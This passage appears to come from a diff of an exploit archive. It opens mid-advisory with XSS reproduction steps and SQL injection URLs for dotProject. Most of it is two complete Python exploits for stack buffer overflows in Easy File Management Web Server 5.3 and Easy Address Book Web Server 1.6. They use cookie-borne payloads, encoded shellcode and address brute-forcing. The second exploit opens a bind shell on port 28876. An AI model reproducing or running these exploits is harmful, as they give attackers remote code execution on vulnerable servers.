5. Fill in "<script>alert(\&#039;xss\&#039;);</script>" for the &#039;Subject&#039; and
&#039;Message&#039; fields
4. Click on the &#039;submit&#039; button in the lower right
5. Observe the XSS at the Forums topics screen or
index.php?m=forums&a=viewer&forum_id=2&message_id=X where &#039;X&#039; is the id
of the topic
Impact
Any user with the permissions to create new tickets can expose other
users of dotProject to XSS attacks.
SQL Injection Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
SQL injection vulnerabilities could allow an attacker to expose
sensitive data, such as password hashes, alter the database contents to
introduce stored XSS vulnerabilities, reset administrative user
passwords to allow escalation of privilege and other attacks that could
lead to the compromise of data, user account credentials, or even the
web server.
The following URL&#039;s expose PHP functions that are vulnerable to SQL
injection:
index.php?m=departments&a=addedit&company_id=1&#039;
index.php?m=ticketsmith&a=view&ticket=1&#039;
index.php?m=files&a=index&tab=4&folder=1&#039;
Additionally some forms allow for SQL injection:
* The ticket creation form index.php?m=ticketsmith&a=post_ticket does
not properly sanitize single quotes in the Name or Email fields

90
platforms/windows/remote/33453.py Executable file
View file

@ -0,0 +1,90 @@
#!/usr/bin/env python
# Exploit Title: Easy File Management Web Server 5.3 stack buffer overflow
# Date: 19 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.efssoft.com
# Software Link: http://www.web-file-management.com/download.php
# Version: 5.3
# Tested on: English version of Windows XP Professional SP2 and SP3
#
# Description:
# By setting UserID in the cookie to a long string, we can overwrite EDX which
# allows us to control execution flow when the following instruction is
# executed:
#
# 0x00468702: call dword ptr [edx+28h]
#
# Very similar to Easy File Sharing Web Server 6.8 exploit here:
# http://www.exploit-db.com/exploits/33352/
# I suspect their other web server solutions might be vulnerable to a similar
# overflow.
#
# Tested with Easy File Management Web Server installed in the default location
# at C:\EFS Software\Easy File Management Web Server
import socket
import struct
import sys
target = "172.16.229.134"
port = 80
# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
# msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin
# [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
"\x1c\x39\xbd"
)
for i in xrange(1,255):
n = ""
if i < 16:
n = "0" + hex(i)[-1]
else:
n = hex(i)[2:]
# craft the value of EDX that will be used in CALL DWORD PTR DS:[EDX+28]
# only second byte changes in the stack address changes, so we can brute
# force it
guess = "0x01" + n + "9898"
print "trying", guess
payload = "A"*20 # padding
payload += struct.pack("<I", 0x1001646a) # call edi @LoadImage.dll
payload += "B"*56 # padding
payload += struct.pack("<I", int(guess, 16)) # guessed address in stack
# containing pointer to
# call edi
payload += "\x90"*20 # nop sled
payload += shellcode # win!
# craft the request
buf = (
"GET /vfolder.ghp HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host:" + target + ":" + str(port) + "\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://" + target + "/\r\n"
"Cookie: SESSIONID=6771; UserID=" + payload + "; PassWD=;\r\n"
"Conection: Keep-Alive\r\n\r\n"
)
# send the request and payload to the server
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((target, port))
s1.send(buf)
s1.close()

117
platforms/windows/remote/33454.py Executable file
View file

@ -0,0 +1,117 @@
#!/usr/bin/env python
# Exploit Title: Easy Address Book Web Server 1.6 stack buffer overflow
# Date: 19 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html
# Software Link: http://www.efssoft.com/eabws.exe
# Version: 1.6
# Tested on: English version of Windows XP Professional SP2 and SP3
#
# Description:
# By setting UserID in the cookie to a long string, we can overwrite EDX which
# allows us to control execution flow when "call dword ptr [edx+28h]" is
# executed. EDX is overwritten with an address pointing to a location on the
# stack which in turn points to a NOP sled leading to the shellcode. This
# address on the stack is brute forced, but doesn't take long since only the
# 2nd byte is always different, so the address is always 0x01??B494.
#
# It's similar to Easy File Sharing Web Server 6.8 exploit here.
# http://www.exploit-db.com/exploits/33352/ I suspect same code reused for
# their Web Server series of applications.
#
# Tested with Easy Address Book Web Server installed in the default location
# at C:\EFS Software\Easy Address Book Web Server
#
# The exploit can sometimes fail the first time, so try a few more times and
# you might get a shell.
import socket
import struct
import sys
target = "172.16.229.134"
port = 80
# Shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/
# Binds a shell on port 28876
# msfencode -b '\x00\x20' -i w32-bind-ngs-shellcode.bin
# [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
shellcode = (
"\xbb\xa1\x68\xde\x7c\xdd\xc0\xd9\x74\x24\xf4\x58\x33\xc9" +
"\xb1\x36\x31\x58\x14\x83\xe8\xfc\x03\x58\x10\x43\x9d\xef" +
"\xb5\xe7\xd5\x61\x76\x6c\x9f\x8d\xfd\x04\x7c\x05\x6f\xe0" +
"\xf7\x67\x50\x7b\x31\xa0\xdf\x63\x4b\x23\x8e\xfb\x81\x9c" +
"\x02\xc9\x8d\x44\x33\x5a\x3d\xe1\x0c\x2b\xc8\x69\xfb\xd5" +
"\x7e\x8a\xd5\xd5\xa8\x41\xac\x02\x7c\xaa\x05\x8d\xd0\x0c" +
"\x0b\x5a\x82\x0d\x44\x48\x80\x5d\x10\xcd\xf4\xea\x7a\xf0" +
"\x7c\xec\x69\x81\x36\xce\x6c\x7c\x9e\x3f\xbd\x3c\x94\x74" +
"\xd0\xc1\x44\xc0\xe4\x6d\xac\x58\x21\xa9\xf1\xeb\x44\xc6" +
"\x30\x2b\xd2\xc3\x1b\xb8\x57\x37\xa5\x57\x68\x80\xb1\xf6" +
"\xfc\xa5\xa5\xf9\xeb\xb0\x3e\xfa\xef\x53\x15\x7d\xd1\x5a" +
"\x1f\x76\xa3\x02\xdb\xd5\x44\x6a\xb4\x4c\x3a\xb4\x48\x1a" +
"\x8a\x96\x03\x1b\x3c\x8b\xa3\x34\x28\x52\x74\x4b\xac\xdb" +
"\xb8\xd9\x43\xb4\x13\x48\x9b\xea\xe9\xb3\x17\xf2\xc3\xe1" +
"\x8a\x6a\x47\x6b\x4f\x4a\x0a\x0f\xab\xb2\xbf\x5b\x18\x04" +
"\xf8\x72\x5e\xdc\x80\xb9\x45\x8b\xdc\x93\xd7\xf5\xa6\xfc" +
"\xd0\xae\x7a\x51\xb6\x02\x84\x03\xdc\x29\x3c\x50\xf5\xe7" +
"\x3e\x57\xf9"
)
for i in xrange(1,255):
n = ""
if i < 16:
n = "0" + hex(i)[-1]
else:
n = hex(i)[2:]
guess = "0x01" + n + "b494" # value of edx used in
# "call dword ptr ds:[edx+28]
# only 2nd byte changes in stack address
nops = int(guess, 16) + 129 # addres sof nop sled is guess+129 bytes
print "[+] Trying guess at", guess
payload = struct.pack("<I", nops) # pointer to nop sled
payload += "A"*76 # padding
payload += struct.pack("<I", int(guess,16)) # address containing pointer to
# nop sled
payload += "\x90"*20 # nop sled
payload += shellcode # win!
# craft the request
buf = (
"GET /addrbook.ghp HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host:" + target + ":" + str(port) + "\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://" + target + "/\r\n"
"Cookie: SESSIONID=6771; UserID=" + payload + "; PassWD=;\r\n"
"Conection: Keep-Alive\r\n\r\n"
)
try:
# send the request and payload to the server
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((target, port))
s1.send(buf)
s1.close()
except Exception,e:
pass
try:
# check if we guessed the correct address by connecting to port 28876
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((target, 28876))
s2.close()
print "\n[+] Success! A shell is waiting on port 28876!"
sys.exit(0)
except Exception,e:
pass
print "\n[!] Didn't work. Sometimes it takes a few tries, so try again."